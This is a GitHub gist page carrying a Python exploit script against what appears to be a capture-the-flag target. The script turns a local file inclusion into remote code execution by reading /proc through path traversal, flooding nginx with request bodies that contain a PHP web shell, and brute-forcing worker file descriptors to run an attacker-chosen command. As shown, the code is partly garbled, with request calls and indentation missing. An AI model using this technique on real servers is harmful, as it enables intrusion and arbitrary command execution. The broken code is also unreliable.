Skip to content

Instantly share code, notes, and snippets.

Created June 5, 2023 16:57
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save xl00t/71a4ef00913e53642524b0da63780956 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
import sys, threading, requests
URL = f'http://pokatdex-api-v1.pokatmon-app.htb/admin/content/assets/add/hereadd'
cookie = {'SESSA0': 'a'}
# find nginx worker processes
r =, data={'debug':1, 'region':'../../../../../proc/cpuinfo'}, cookies=cookie)
cpus = r.text.count('processor')
r =, data={'debug':1, 'region':'../../../../../proc/sys/kernel/pid_max'}, cookies=cookie)
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')
nginx_workers = []
for pid in range(pid_max):
r =, data={'debug':1,'region':f'../../../../../proc/{pid}/cmdline'}, cookies=cookie)
if b'nginx: worker process' in r.content:
print(f'[*] nginx worker found: {pid}')
if len(nginx_workers) >= cpus:
done = False
# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
print('[+] starting uploader')
while not done:, data='<?php system($_POST["c"]); /*' + 16*1024*'A', cookies=cookie)
for _ in range(16):
t = threading.Thread(target=uploader)
# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid, cmd):
global done
while not done:
print(f'[+] brute loop restarted: {pid}')
for fd in range(32,10,-1):
f = f'../../../../../proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
r =, data={'debug':1, 'region':f'{f}', 'c': cmd}, cookies=cookie)
if r.text:
if 'unknown region' not in r.text:
print(f'[!] {f}: {r.text}')
cmd = sys.argv[1]
for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, cmd, ))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment